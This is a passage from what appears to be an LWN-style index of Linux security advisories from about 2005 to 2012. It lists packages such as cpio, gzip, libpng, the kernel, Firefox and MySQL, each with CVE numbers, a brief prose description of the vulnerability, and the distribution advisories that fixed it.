OpenPKG OpenPKG-SA-2005.008 2005-06-10
SuSE SUSE-SR:2005:015 2005-06-07
Debian DSA-730-1 2005-05-27
Mandriva MDKSA-2005:091 2005-05-18
Ubuntu USN-127-1 2005-05-17

Comments (2 posted)

cpio: arbitrary code execution

Package(s):cpio CVE #(s):CVE-2005-4268
Created:January 2, 2006 Updated:March 17, 2010
Description: Richard Harms discovered that cpio did not sufficiently validate file properties when creating archives. Files with, e.g., a very large size caused a buffer overflow. By tricking a user or an automatic backup system into putting a specially crafted file into a cpio archive, a local attacker could probably exploit this to execute arbitrary code with the privileges of the target user (which is likely root in an automatic backup system).
Alerts:
CentOS CESA-2010:0145 2010-03-17
Red Hat RHSA-2010:0145-01 2010-03-15
rPath rPSA-2007-0094-1 2007-05-07
Red Hat RHSA-2007:0245-02 2007-05-01
Ubuntu USN-234-1 2006-01-02

Comments (none posted)

vixie-cron: privilege escalation

Package(s):cron CVE #(s):CVE-2006-2607
Created:May 31, 2006 Updated:June 1, 2009
Description: The Vixie cron daemon does not check the return code from setuid(); if that call can be made to fail, a local attacker may be able to execute commands as root.
Alerts:
Ubuntu USN-778-1 2009-06-01
Red Hat RHSA-2006:0539-01 2006-07-12
Gentoo 200606-07 2006-06-09
SuSE SUSE-SA:2006:027 2006-05-31
rPath rPSA-2006-0082-1 2006-05-25

Comments (1 posted)

cscope: buffer overflows

Package(s):cscope CVE #(s):CVE-2006-4262
Created:October 2, 2006 Updated:June 16, 2009
Description: Will Drewry of the Google Security Team discovered several buffer overflows in cscope, a source browsing tool, which might lead to the execution of arbitrary code.
Alerts:
CentOS CESA-2009:1101 2009-06-16
Red Hat RHSA-2009:1101-01 2009-06-15
Gentoo 200610-08 2006-10-20
Debian DSA-1186-1 2006-09-30

Comments (none posted)

cscope: buffer overflows

Package(s):cscope CVE #(s):CVE-2004-2541
Created:May 22, 2006 Updated:June 19, 2009
Description: A buffer overflow in Cscope 15.5, and possibly multiple overflows, allows remote attackers to execute arbitrary code via a C file with a long #include line that is later browsed by the target.
Alerts:
CentOS CESA-2009:1102 2009-06-19
CentOS CESA-2009:1101 2009-06-16
Red Hat RHSA-2009:1102-01 2009-06-15
Red Hat RHSA-2009:1101-01 2009-06-15
Gentoo 200606-10 2006-06-11
Debian DSA-1064-1 2006-05-19

Comments (1 posted)

Cyrus-SASL: DIGEST-MD5 Pre-Authentication Denial of Service

Package(s):cyrus-sasl CVE #(s):CVE-2006-1721
Created:April 21, 2006 Updated:September 4, 2007
Description: Cyrus-SASL contains an unspecified vulnerability in the DIGEST-MD5 process that could lead to a Denial of Service. An attacker could possibly exploit this vulnerability by sending a specially crafted data stream to the Cyrus-SASL server, resulting in a Denial of Service even if the attacker is not able to authenticate.
Alerts:
Red Hat RHSA-2007:0878-01 2007-09-04
Red Hat RHSA-2007:0795-01 2007-09-04
SuSE SUSE-SA:2006:025 2006-05-05
Fedora FEDORA-2006-515 2006-05-04
Debian DSA-1042-1 2006-04-25
Mandriva MDKSA-2006:073 2006-04-24
Ubuntu USN-272-1 2006-04-24
Gentoo 200604-09 2006-04-21

Comments (none posted)

ffmpeg: buffer overflows

Package(s):ffmpeg CVE #(s):CVE-2006-4799 CVE-2006-4800
Created:September 14, 2006 Updated:May 28, 2007
Description: The AVI processing code in FFmpeg has a number of buffer overflow vulnerabilities. If an attacker can trick a user into loading a specially crafted AVI, arbitrary code can be executed with the user's privileges.
Alerts:
Gentoo 200609-09 2006-09-13

Comments (2 posted)

freeradius: several vulnerabilities

Package(s):freeradius CVE #(s):CVE-2005-4745 CVE-2005-4746
Created:August 8, 2006 Updated:April 24, 2007
Description: Several remote vulnerabilities have been discovered in freeradius, a high-performance RADIUS server, which may lead to SQL injection or denial of service.
Alerts:
Mandriva MDKSA-2007:092 2007-04-23
Debian DSA-1145-1 2006-08-08

Comments (none posted)

freetype: integer overflows

Package(s):freetype CVE #(s):CVE-2006-0747 CVE-2006-1861 CVE-2006-2493 CVE-2006-2661 CVE-2006-3467
Created:June 8, 2006 Updated:June 1, 2010
Description: The FreeType library has several integer overflow vulnerabilities. If a user can be tricked into installing a specially crafted font file, arbitrary code can be executed with the privilege of the user.
Alerts:
Gentoo 201006-01 2010-06-01
Fedora FEDORA-2009-5644 2009-05-28
Fedora FEDORA-2009-5558 2009-05-28
CentOS CESA-2009:0329 2009-05-22
Red Hat RHSA-2009:1062-01 2009-05-22
Red Hat RHSA-2009:0329-02 2009-05-22
Gentoo 200710-09 2007-10-09
Debian DSA-1178-1 2006-09-16
Ubuntu USN-341-1 2006-09-06
Gentoo 200609-04 2006-09-06
rPath rPSA-2006-0157-1 2006-08-25
Mandriva MDKSA-2006:148 2006-08-24
Red Hat RHSA-2006:0635-01 2006-08-21
Red Hat RHSA-2006:0634-01 2006-08-21
Fedora FEDORA-2006-912 2006-08-14
SuSE SUSE-SA:2006:045 2006-08-01
OpenPKG OpenPKG-SA-2006.017 2006-07-28
Ubuntu USN-324-1 2006-07-27
Slackware SSA:2006-207-02 2006-07-27
Mandriva MDKSA-2006:129 2006-07-20
Gentoo 200607-02 2006-07-09
SuSE SUSE-SA:2006:037 2006-06-27
Mandriva MDKSA-2006:099-1 2006-06-13
Mandriva MDKSA-2006:099 2006-06-12
rPath rPSA-2006-0100-1 2006-06-12
Debian DSA-1095-1 2006-06-10
Ubuntu USN-291-1 2006-06-08

Comments (none posted)

gcc: file overwrite vulnerability

Package(s):gcc CVE #(s):CVE-2006-3619
Created:September 6, 2006 Updated:March 14, 2008
Description: The fastjar utility found in the GNU compiler collection does not perform adequate file path checking, allowing the creation or overwriting of files outside of the current directory tree.
Alerts:
Mandriva MDVSA-2008:066 2007-03-13
Red Hat RHSA-2007:0473-01 2007-06-11
Red Hat RHSA-2007:0220-02 2007-05-01
Debian DSA-1170-1 2006-09-06

Comments (none posted)

gdb: buffer overflow

Package(s):gdb CVE #(s):CVE-2006-4146
Created:September 15, 2006 Updated:June 12, 2007
Description: A buffer overflow in dwarfread.c and dwarf2read.c debugging code in GNU Debugger (GDB) 6.5 allows user-assisted attackers, or restricted users, to execute arbitrary code via a crafted file with a location block (DW_FORM_block) that contains a large number of operations.
Alerts:
Red Hat RHSA-2007:0469-01 2007-06-11
Red Hat RHSA-2007:0229-02 2007-05-01
Ubuntu USN-356-1 2006-10-02
Fedora FEDORA-2006-975 2006-09-14

Comments (none posted)

gdm: improper file permissions

Package(s):gdm CVE #(s):CVE-2006-1057
Created:April 19, 2006 Updated:May 2, 2007
Description: The .ICEauthority file may be created with the wrong ownership and permissions; gdm 2.14.2 fixes the problem.
Alerts:
Red Hat RHSA-2007:0286-02 2007-05-01
Mandriva MDKSA-2006:083 2006-05-09
Ubuntu USN-278-1 2006-05-03
Debian DSA-1040-1 2006-04-24
Fedora FEDORA-2006-338 2006-04-19

Comments (none posted)

gedit: format string vulnerability

Package(s):gedit CVE #(s):CAN-2005-1686
Created:June 9, 2005 Updated:February 5, 2009
Description: A format string vulnerability has been discovered in gedit. Calling the program with specially crafted file names caused a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the gedit user.
Alerts:
Fedora FEDORA-2009-1189 2009-01-29
Fedora FEDORA-2009-1187 2009-01-29
Debian DSA-753-1 2005-07-12
Mandriva MDKSA-2005:102 2005-06-15
Red Hat RHSA-2005:499-01 2005-06-13
Gentoo 200506-09 2005-06-11
Ubuntu USN-138-1 2005-06-09

Comments (1 posted)

grip: buffer overflow

Package(s):grip CVE #(s):CAN-2005-0706
Created:March 10, 2005 Updated:November 19, 2008
Description: Grip, a CD ripper, has a buffer overflow vulnerability that can occur when the CDDB server returns more than 16 matches.
Alerts:
Fedora FEDORA-2008-9604 2008-11-19
Fedora FEDORA-2008-9521 2008-11-19
Fedora-Legacy FLSA:152919 2005-09-15
Mandriva MDKSA-2005:074 2005-04-20
Mandriva MDKSA-2005:075 2005-04-20
Gentoo 200504-07 2005-04-08
Mandrake MDKSA-2005:066 2005-04-01
Red Hat RHSA-2005:304-01 2005-03-28
Gentoo 200503-21 2005-03-17
Fedora FEDORA-2005-203 2005-03-09
Fedora FEDORA-2005-202 2005-03-09

Comments (none posted)

gzip: multiple vulnerabilities

Package(s):gzip CVE #(s):CVE-2006-4334 CVE-2006-4335 CVE-2006-4336 CVE-2006-4337 CVE-2006-4338
Created:September 19, 2006 Updated:January 20, 2010
Description: Tavis Ormandy of the Google Security Team discovered two denial of service flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to hang or crash.

Tavis Ormandy of the Google Security Team discovered several code execution flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to crash or execute arbitrary code.

Alerts:
Debian DSA-1974-1 2010-01-20
Fedora FEDORA-2007-557 2007-05-31
Gentoo 200611-24 2006-11-28
Fedora-Legacy FLSA:211760 2006-11-13
Fedora FEDORA-2006-989 2006-10-10
SuSE SUSE-SA:2006:056 2006-09-26
Gentoo 200609-13 2006-09-23
Trustix TSLSA-2006-0052 2006-09-22
Mandriva MDKSA-2006:167 2006-09-20
Slackware SSA:2006-262-01 2006-09-20
OpenPKG OpenPKG-SA-2006.020 2006-09-20
Debian DSA-1181-1 2006-09-19
rPath rPSA-2006-0170-1 2006-09-19
Ubuntu USN-349-1 2006-09-19
Red Hat RHSA-2006:0667-01 2006-09-19

Comments (1 posted)

gzip: arbitrary command execution

Package(s):gzip CVE #(s):CAN-2005-0758
Created:August 1, 2005 Updated:January 10, 2007
Description: zgrep in gzip before 1.3.5 does not handle shell metacharacters like '|' and '&' properly when they occur in input file names. This could be exploited to execute arbitrary commands with user privileges if zgrep is run in an untrusted directory with specially crafted file names.
Alerts:
OpenPKG OpenPKG-SA-2007.002 2007-01-08
Mandriva MDKSA-2006:027 2006-01-30
Mandriva MDKSA-2006:026 2006-01-30
Fedora-Legacy FLSA:158801 2005-11-14
Fedora-Legacy FLSA:157696 2005-08-10
Ubuntu USN-161-1 2005-08-04
Ubuntu USN-158-1 2005-08-01

Comments (2 posted)

ImageMagick: buffer overflows

Package(s):ImageMagick CVE #(s):CVE-2006-5456
Created:October 31, 2006 Updated:March 8, 2007
Description: Multiple buffer overflows in GraphicsMagick before 1.1.7 and ImageMagick 6.0.7 allow user-assisted attackers to cause a denial of service and possibly execute arbitrary code via (1) a DCM image that is not properly handled by the ReadDCMImage function in coders/dcm.c, or (2) a PALM image that is not properly handled by the ReadPALMImage function in coders/palm.c.
Alerts:
Slackware SSA:2007-066-06 2007-03-08
rPath rPSA-2007-0029-1 2007-02-08
rPath rPSA-2006-0218-1 2006-11-27
Gentoo 200611-19 2006-11-24
Fedora FEDORA-2006-1285 2006-11-22
Fedora FEDORA-2006-1286 2006-11-22
Debian DSA-1213-1 2006-11-19
SuSE SUSE-SA:2006:066 2006-11-14
Gentoo 200611-07 2006-11-13
Ubuntu USN-372-1 2006-11-01
Mandriva MDKSA-2006:193 2006-10-30

Comments (2 posted)

kdelibs: integer overflow

Package(s):kdelibs CVE #(s):CVE-2006-4811
Created:October 18, 2006 Updated:March 5, 2007
Description: The KDE khtml library can pass untrusted parameters into Qt, allowing a hostile user to trigger an integer overflow there and execute arbitrary code.
Alerts:
Gentoo 200703-06 2007-03-04
Gentoo 200611-02 2006-11-06
Red Hat RHSA-2006:0725-01 2006-11-01
Debian DSA-1200-1 2006-10-30
Slackware SSA:2006-298-01 2006-10-26
rPath rPSA-2006-0195-2 2006-10-18
Mandriva MDKSA-2006:186 2006-10-19
rPath rPSA-2006-0195-1 2006-10-18
Red Hat RHSA-2006:0720-01 2006-10-18

Comments (none posted)

kdelibs: kate backup file permission leak

Package(s):kdelibs kate kwrite CVE #(s):CAN-2005-1920
Created:July 19, 2005 Updated:September 21, 2010
Description: Kate / Kwrite, as shipped with KDE 3.2.x up to and including 3.4.0, creates a file backup before saving a modified file. These backup files are created with default permissions, even if the original file had more strict permissions set. See this advisory for more information.
Alerts:
Gentoo 200611-21 2006-11-27
Debian DSA-804-2 2005-11-10
Debian DSA-804-1 2005-09-08
Red Hat RHSA-2005:612-01 2005-07-27
Ubuntu USN-150-1 2005-07-21
Mandriva MDKSA-2005:122 2005-07-20
Fedora FEDORA-2005-594 2005-07-19

Comments (1 posted)

kernel: denial of service

Package(s):kernel CVE #(s):CVE-2006-4623
Created:October 18, 2006 Updated:November 14, 2007
Description: The kernel DVB layer can be caused to crash with maliciously-formatted unidirectional lightweight encapsulation (ULE) data.
Alerts:
Ubuntu USN-489-1 2007-07-19
rPath rPSA-2006-0194-1 2006-10-17

Comments (none posted)

kernel: denial of service

Package(s):kernel CVE #(s):CVE-2006-4535 CVE-2006-4538
Created:September 18, 2006 Updated:January 5, 2009
Description: Sridhar Samudrala discovered a local denial of service vulnerability in the handling of SCTP sockets. By opening such a socket with a special SO_LINGER value, a local attacker could exploit this to crash the kernel. (CVE-2006-4535)

Kirill Korotaev discovered that the ELF loader on the ia64 and sparc platforms did not sufficiently verify the memory layout. By attempting to execute a specially crafted executable, a local user could exploit this to crash the kernel. (CVE-2006-4538)

Alerts:
Red Hat RHSA-2008:0787-01 2009-01-05
Red Hat RHSA-2007:1049-01 2007-12-03
Mandriva MDKSA-2006:182 2006-10-11
Red Hat RHSA-2006:0689-01 2006-10-05
Debian DSA-1184-2 2006-09-26
Debian DSA-1184-1 2006-09-25
Debian DSA-1183-1 2006-09-25
Ubuntu USN-347-1 2006-09-18

Comments (none posted)

kernel: denial of service by memory consumption

Package(s):kernel CVE #(s):CVE-2006-2936
Created:July 17, 2006 Updated:November 14, 2007
Description: The ftdi_sio driver (usb/serial/ftdi_sio.c) in Linux kernel 2.6.x up to 2.6.17, and possibly later versions, allows local users to cause a denial of service (memory consumption) by writing more data to the serial port than the driver can handle, which causes the data to be queued.
Alerts:
SuSE SUSE-SA:2007:035 2007-06-14
Mandriva MDKSA-2006:151 2006-08-25
Mandriva MDKSA-2006:150 2006-08-25
Ubuntu USN-331-1 2006-08-03
rPath rPSA-2006-0130-1 2006-07-17

Comments (none posted)

kernel: denial of service

Package(s):kernel CVE #(s):CVE-2006-2935 CVE-2006-4145 CVE-2006-3745
Created:September 1, 2006 Updated:July 30, 2008
Description: Previous versions of the kernel package are subject to several vulnerabilities. Certain malformed UDF filesystems can cause the system to crash (denial of service). Malformed CDROM firmware or USB storage devices (such as USB keys) could cause system crash (denial of service), and if they were intentionally malformed, can cause arbitrary code to run with elevated privileges. In addition, the SCTP protocol is subject to a remote system crash (denial of service) attack.
Alerts:
Red Hat RHSA-2008:0665-01 2008-07-24
SuSE SUSE-SA:2007:053 2007-10-12
SuSE SUSE-SA:2006:064 2006-11-10
Red Hat RHSA-2006:0710-01 2006-10-19
SuSE SUSE-SA:2006:057 2006-09-28
Trustix TSLSA-2006-0051 2006-09-15
Ubuntu USN-346-2 2006-09-14
Ubuntu USN-346-1 2006-09-14
rPath rPSA-2006-0162-1 2006-08-31

Comments (none posted)

krb5: local privilege escalation

Package(s):krb5 CVE #(s):CVE-2006-3083
Created:August 9, 2006 Updated:July 7, 2010
Description: Some kerberos applications fail to check the results of setuid() calls, with the result that, if that call fails, they could continue to execute as root after thinking they had switched to a nonprivileged user. A local attacker who can cause these calls to fail (through resource exhaustion, presumably) could exploit this bug to gain root privileges.
Alerts:
Mandriva MDVSA-2010:129 2010-07-07
SuSE SUSE-SR:2006:022 2006-09-08
Gentoo 200608-21 2006-08-23
Ubuntu USN-334-1 2006-08-16
Fedora FEDORA-2006-905 2006-08-09
Mandriva MDKSA-2006:139 2006-09-09
Gentoo 200608-15 2006-08-10
rPath rPSA-2006-0150-1 2006-08-09
Red Hat RHSA-2006:0612-01 2006-08-08
Debian DSA-1146-1 2006-08-09

Comments (none posted)

libgadu: memory alignment bug

Package(s):libgadu CVE #(s):CAN-2005-2370
Created:July 29, 2005 Updated:June 25, 2007
Description: Szymon Zygmunt and Michal Bartoszkiewicz discovered a memory alignment error in libgadu (from ekg, a console Gadu Gadu client, an instant messaging program), which is included in gaim, a multi-protocol instant messaging client, as well. This cannot be exploited on the x86 architecture, but on others, e.g. Sparc, it can lead to a bus error, in other words a denial of service.
Alerts:
Debian DSA-813-1 2005-09-15
Red Hat RHSA-2005:627-01 2005-08-09
Debian DSA-769-1 2005-07-29

Comments (none posted)

libgd2: denial of service

Package(s):libgd2 CVE #(s):CVE-2006-2906
Created:June 14, 2006 Updated:January 16, 2007
Description: Certain GIF images can cause libgd2 to go into an infinite loop, adversely affecting the performance of image processing applications.
Alerts:
rPath rPSA-2007-0008-1 2007-01-15
Debian DSA-1117-1 2006-07-21
Mandriva MDKSA-2006:113 2006-06-27
Mandriva MDKSA-2006:112 2006-06-27
Ubuntu USN-298-1 2006-06-13

Comments (none posted)

libmms: buffer overflows

Package(s):libmms CVE #(s):CVE-2006-2200
Created:July 6, 2006 Updated:December 25, 2006
Description: Several buffer overflows were found in libmms. By tricking a user into opening a specially crafted remote multimedia stream with an application using libmms, a remote attacker could overwrite an arbitrary memory portion with zeros, thereby crashing the program.
Alerts:
Slackware SSA:2006-357-05 2006-12-25
Gentoo 200607-07 2006-07-20
Mandriva MDKSA-2006:121 2006-07-12
Mandriva MDKSA-2006:117-1 2006-07-12
Ubuntu USN-315-1 2006-07-12
Mandriva MDKSA-2006:117 2006-07-06
Ubuntu USN-309-1 2006-07-05

Comments (none posted)

libpng: buffer overflow

Package(s):libpng CVE #(s):CVE-2006-3334
Created:July 19, 2006 Updated:December 15, 2008
Description: In pngrutil.c, the function png_decompress_chunk() allocates insufficient space for an error message, potentially overwriting stack data, leading to a buffer overflow.
Alerts:
Gentoo 200812-15 2008-12-14
Mandriva MDKSA-2006:213 2006-11-16
rPath rPSA-2006-0133-1 2006-07-19
Gentoo 200607-06 2006-07-19

Comments (none posted)

libpng: heap based buffer overflow

Package(s):libpng CVE #(s):CVE-2006-0481
Created:February 13, 2006 Updated:December 15, 2008
Description: A heap based buffer overflow bug was found in the way libpng strips alpha channels from a PNG image. An attacker could create a carefully crafted PNG image file in such a way that it could cause an application linked with libpng to crash or execute arbitrary code when the file is opened by a victim.
Alerts:
Gentoo 200812-15 2008-12-14
Red Hat RHSA-2006:0205-01 2006-02-13

Comments (1 posted)

libtiff: buffer overflow

Package(s):libtiff CVE #(s):CVE-2006-2193
Created:June 15, 2006 Updated:September 1, 2008
Description: The t2p_write_pdf_string function in libtiff 3.8.2 and earlier is vulnerable to a buffer overflow. Attackers can use a TIFF file with UTF-8 characters in the DocumentName tag to overflow a buffer, causing a denial of service, and possibly the execution of arbitrary code.
Alerts:
CentOS CESA-2008:0848 2008-08-30
Red Hat RHSA-2008:0848-01 2008-08-28
Fedora FEDORA-2006-952 2006-09-05
SuSE SUSE-SA:2006:044 2006-08-01
Gentoo 200607-03 2006-07-09
SuSE SUSE-SR:2006:014 2006-06-20
Trustix TSLSA-2006-0036 2006-06-16
Mandriva MDKSA-2006:102 2006-06-14

Comments (none posted)

libvncserver: authentication bypass

Package(s):libvncserver CVE #(s):CVE-2006-2450
Created:August 4, 2006 Updated:March 19, 2007
Description: LibVNCServer fails to properly validate protocol types, effectively letting users decide what protocol to use, such as "Type 1 - None". LibVNCServer will accept this security type even if it is not offered by the server.
Alerts:
Gentoo 200703-19 2007-03-18
Gentoo 200608-12 2006-08-07
Gentoo 200608-05 2006-08-04

Comments (none posted)

libwmf: integer overflow

Package(s):libwmf CVE #(s):CVE-2006-3376
Created:July 13, 2006 Updated:November 6, 2006
Description: libwmf, a library that is used for processing Windows MetaFile vector graphics files, has an integer overflow vulnerability.
Alerts:
OpenPKG OpenPKG-SA-2006.031 2006-11-06
Debian DSA-1194-1 2006-10-09
Gentoo 200608-17 2006-08-10
Ubuntu USN-333-1 2006-08-09
Mandriva MDKSA-2006:132 2006-07-28
Fedora FEDORA-2006-831 2006-07-18
Fedora FEDORA-2006-832 2006-07-18
Fedora FEDORA-2006-805 2006-07-12
Fedora FEDORA-2006-804 2006-07-12

Comments (none posted)

libxml2: arbitrary code execution

Package(s):libxml2 CVE #(s):CAN-2004-0110
Created:February 26, 2004 Updated:August 19, 2009
Description: Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6. When fetching a remote resource via FTP or HTTP, libxml2 uses special parsing routines. These routines can overflow a buffer if passed a very long URL. If an attacker is able to find an application using libxml2 that parses remote resources and allows them to influence the URL, then this flaw could be used to execute arbitrary code.
Alerts:
Fedora FEDORA-2009-8594 2009-08-15
Fedora FEDORA-2009-8582 2009-08-15
Fedora-Legacy FLSA:1324 2004-07-19
Conectiva CLA-2004:836 2004-03-31
Gentoo 200403-01 2004-03-06
Trustix TSLSA-2004-0010 2004-03-05
OpenPKG OpenPKG-SA-2004.003 2004-03-05
Netwosix NW-2004-0004 2004-03-04
Debian DSA-455-1 2004-03-03
Mandrake MDKSA-2004:018 2004-03-03
Red Hat RHSA-2004:091-02 2004-03-03
Whitebox WBSA-2004:090-01 2004-03-01
Red Hat RHSA-2004:090-01 2004-02-26
Fedora FEDORA-2004-087 2004-02-25
Red Hat RHSA-2004:091-01 2004-02-26

Comments (none posted)

libxml2: multiple buffer overflows

Package(s):libxml2 CVE #(s):CAN-2004-0989
Created:October 28, 2004 Updated:August 19, 2009
Description: libxml2 prior to version 2.6.14 has multiple buffer overflow vulnerabilities; if a local user passes a specially crafted FTP URL, arbitrary code may be executed.
Alerts:
Fedora FEDORA-2009-8594 2009-08-15
Fedora FEDORA-2009-8582 2009-08-15
Ubuntu USN-89-1 2005-02-28
Red Hat RHSA-2004:650-01 2004-12-16
Conectiva CLA-2004:890 2004-11-18
Red Hat RHSA-2004:615-01 2004-11-12
Mandrake MDKSA-2004:127 2004-11-04
Debian DSA-582-1 2004-11-02
Gentoo 200411-05 2004-11-02
Trustix TSLSA-2004-0055 2004-10-29
OpenPKG OpenPKG-SA-2004.050 2004-10-31
Ubuntu USN-10-1 2004-10-28
Fedora FEDORA-2004-353 2004-10-28

Comments (none posted)

linux-restricted-modules: nVidia driver vulnerability

Package(s):linux-restricted-modules CVE #(s):CVE-2006-5379
Created:November 6, 2006 Updated:January 11, 2007
Description: Derek Abdine discovered that the NVIDIA Xorg driver did not correctly verify the size of buffers used to render text glyphs. When displaying very long strings of text, the Xorg server would crash. If a user were tricked into viewing a specially crafted series of glyphs, this flaw could be exploited to run arbitrary code with root privileges.
Alerts:
Mandriva MDKSA-2007:007 2007-01-10
Gentoo 200611-03 2006-11-07
Ubuntu USN-377-1 2006-11-03

Comments (none posted)

lynx: arbitrary command execution

Package(s):lynx CVE #(s):CVE-2005-2929
Created:November 14, 2005 Updated:September 14, 2009
Description: An arbitrary command execution bug was found in the lynx "lynxcgi:" URI handler. An attacker could create a web page redirecting to a malicious URL which could execute arbitrary code as the user running lynx.
Alerts:
Gentoo 200909-15 2009-09-12
Fedora-Legacy FLSA:152832 2005-12-17
OpenPKG OpenPKG-SA-2005.026 2005-12-03
Fedora FEDORA-2005-1079 2005-11-14
Fedora FEDORA-2005-1078 2005-11-14
Gentoo 200511-09 2005-11-13
Mandriva MDKSA-2005:211 2005-11-12
Red Hat RHSA-2005:839-01 2005-11-11

Comments (none posted)

mono: symlink vulnerability

Package(s):mono CVE #(s):CVE-2006-5072
Created:October 4, 2006 Updated:December 1, 2006
Description: The mono System.CodeDom.Compiler classes suffer from a temporary file symlink vulnerability which could be used to overwrite files, or, in this case, even inject arbitrary code into a running mono application.
Alerts:
SuSE SUSE-SA:2006:073 2006-12-01
Gentoo 200611-23 2006-11-28
Mandriva MDKSA-2006:188 2006-10-27
Fedora FEDORA-2006-1012 2006-10-06
Ubuntu USN-357-1 2006-10-04

Comments (none posted)

firefox: multiple vulnerabilities

Package(s):mozilla firefox thunderbird CVE #(s):CVE-2006-4565 CVE-2006-4566 CVE-2006-4571 CVE-2006-4253 CVE-2006-4567 CVE-2006-4568 CVE-2006-4569
Created:September 15, 2006 Updated:November 14, 2006
Description: Two flaws were found in the way Firefox/Thunderbird processed certain regular expressions. A malicious web page/HTML email could crash the browser or possibly execute arbitrary code as the user running Firefox/Thunderbird. (CVE-2006-4565, CVE-2006-4566)

A number of flaws were found in Firefox/Thunderbird. A malicious web page/HTML email could crash the browser or possibly execute arbitrary code as the user running Firefox/Thunderbird. (CVE-2006-4571)

A flaw was found in the handling of JavaScript timed events. A malicious web page could crash the browser or possibly execute arbitrary code as the user running Firefox/Thunderbird. (CVE-2006-4253)

A flaw was found in the Firefox/Thunderbird auto-update verification system. An attacker who has the ability to spoof a victim's DNS could get Firefox to download and install malicious code. In order to exploit this issue an attacker would also need to get a victim to previously accept an unverifiable certificate. (CVE-2006-4567)

Firefox did not properly prevent a frame in one domain from injecting content into a sub-frame that belongs to another domain, which facilitates website spoofing and other attacks. (CVE-2006-4568)

Firefox did not load manually opened, blocked popups in the right domain context, which could lead to cross-site scripting attacks. In order to exploit this issue an attacker would need to find a site which would frame their malicious page and convince the user to manually open a blocked popup. (CVE-2006-4569)

Alerts:
Debian DSA-1210-1 2006-11-14
Gentoo 200610-04 2006-10-16
Ubuntu USN-361-1 2006-10-10
Debian DSA-1192-1 2006-10-06
Gentoo 200610-01 2006-10-04
Debian DSA-1191-1 2006-10-05
Ubuntu USN-354-1 2006-10-02
Gentoo 200609-19 2006-09-28
Mandriva MDKSA-2006:169 2006-09-22
Ubuntu USN-352-1 2006-09-25
Ubuntu USN-351-1 2006-09-22
SuSE SUSE-SA:2006:054 2006-09-22
Ubuntu USN-350-1 2006-09-21
Mandriva MDKSA-2006:168 2006-09-20
Red Hat RHSA-2006:0677-01 2006-09-15
Red Hat RHSA-2006:0676-01 2006-09-15
Red Hat RHSA-2006:0675-01 2006-09-15
rPath rPSA-2006-0169-1 2006-09-15
Slackware SSA:2006-257-03 2006-09-15
Fedora FEDORA-2006-977 2006-09-14
Fedora FEDORA-2006-976 2006-09-14

Comments (none posted)

mutt: race conditions

Package(s):mutt CVE #(s):CVE-2006-5297 CVE-2006-5298
Created:October 30, 2006 Updated:November 1, 2006
Description: A race condition in the safe_open function in the Mutt mail client 1.5.12 and earlier, when creating temporary files in an NFS filesystem, allows local users to overwrite arbitrary files due to limitations of the use of the O_EXCL flag on NFS filesystems. (CVE-2006-5297)

The mutt_adv_mktemp function in the Mutt mail client 1.5.12 and earlier does not properly verify that temporary files have been created with restricted permissions, which might allow local users to create files with weak permissions via a race condition between the mktemp and safe_fopen function calls. (CVE-2006-5298)

Alerts:
Ubuntu USN-373-1 2006-11-01
Mandriva MDKSA-2006:190 2006-10-27

Comments (none posted)

mysql: format string bug

Package(s):mysql CVE #(s):CVE-2006-3469
Created:July 21, 2006 Updated:July 30, 2008
Description: Jean-David Maillefer discovered a format string bug in the date_format() function's error reporting. By calling the function with invalid arguments, an authenticated user could exploit this to crash the server.
Alerts:
Red Hat RHSA-2008:0768-01 2008-07-24
Slackware SSA:2006-211-01 2006-07-31
Ubuntu USN-321-1 2006-07-21

Comments (none posted)

MySQL: privilege violations

Package(s):mysql CVE #(s):CVE-2006-4031 CVE-2006-4226
Created:August 25, 2006 Updated:July 30, 2008
Description: MySQL 4.1 before 4.1.21 and 5.0 before 5.0.24 allows a local user to access a table through a previously created MERGE table, even after the user's privileges are revoked for the original table, which might violate intended security policy (CVE-2006-4031).

MySQL 4.1 before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run on case-sensitive filesystems, allows remote authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions (CVE-2006-4226).

Alerts:
Red Hat RHSA-2008:0768-01 2008-07-24
Red Hat RHSA-2008:0364-01 2008-05-21
Red Hat RHSA-2007:0152-01 2007-04-03
Red Hat RHSA-2007:0083-01 2007-02-19
Fedora FEDORA-2006-1298 2006-11-27
Fedora FEDORA-2006-1297 2006-11-27
Ubuntu USN-338-1 2006-09-05
Mandriva MDKSA-2006:149 2006-08-24

Comments (none posted)

MySQL: logging bypass

Package(s):mysql CVE #(s):CVE-2006-0903
Created:April 4, 2006 Updated:May 21, 2008
Description: MySQL 5.0.18 and earlier allows local users to bypass logging mechanisms via SQL queries that contain the NULL character, which are not properly handled by the mysql_real_query function. NOTE: this issue was originally reported for the mysql_query function, but the vendor states that since mysql_query expects a null character, this is not an issue for mysql_query.
Alerts:
Red Hat RHSA-2008:0364-01 2008-05-21
Ubuntu USN-274-2 2006-05-15
Ubuntu USN-274-1 2006-04-27
Mandriva MDKSA-2006:064 2006-04-03

Comments (2 posted)

nbd: arbitrary code execution

Package(s):nbd CVE #(s):CVE-2005-3534
Created:January 6, 2006 Updated:March 7, 2011
Description: Kurt Fitzner discovered that the NBD (network block device) server did not correctly verify the maximum size of request packets. By sending specially crafted large request packets, a remote attacker who is allowed to access the server could exploit this to execute arbitrary code with root privileges.
Alerts:
SuSE SUSE-SR:2006:001 2006-01-13
Ubuntu USN-237-1 2006-01-06

Comments (none posted)

ncompress: buffer underflow

Package(s):ncompress CVE #(s):CVE-2006-1168
Created:August 10, 2006 Updated:February 21, 2012
Description: The ncompress compression utility has a missing boundary check. A local user can use a maliciously created file to cause a .bss buffer underflow.
Alerts:
Gentoo 200610-03 2006-10-06
Red Hat RHSA-2006:0663-01 2006-09-12
Mandriva MDKSA-2006:140 2006-08-09
Debian DSA-1149-1 2006-08-10
Red Hat RHSA-2012:0308-03 2012-02-21
Scientific Linux SL-busy-20120321 2012-03-21
Red Hat RHSA-2012:0810-04 2012-06-20
Scientific Linux SL-busy-20120709 2012-07-09
Mageia MGASA-2012-0171 2012-07-19
Mandriva MDVSA-2012:129 2012-08-10
Mandriva MDVSA-2012:129-1 2012-08-10

Comments (none posted)

openldap: security bypass

Package(s):openldap CVE #(s):CVE-2006-4600
Created:September 29, 2006 Updated:June 12, 2007
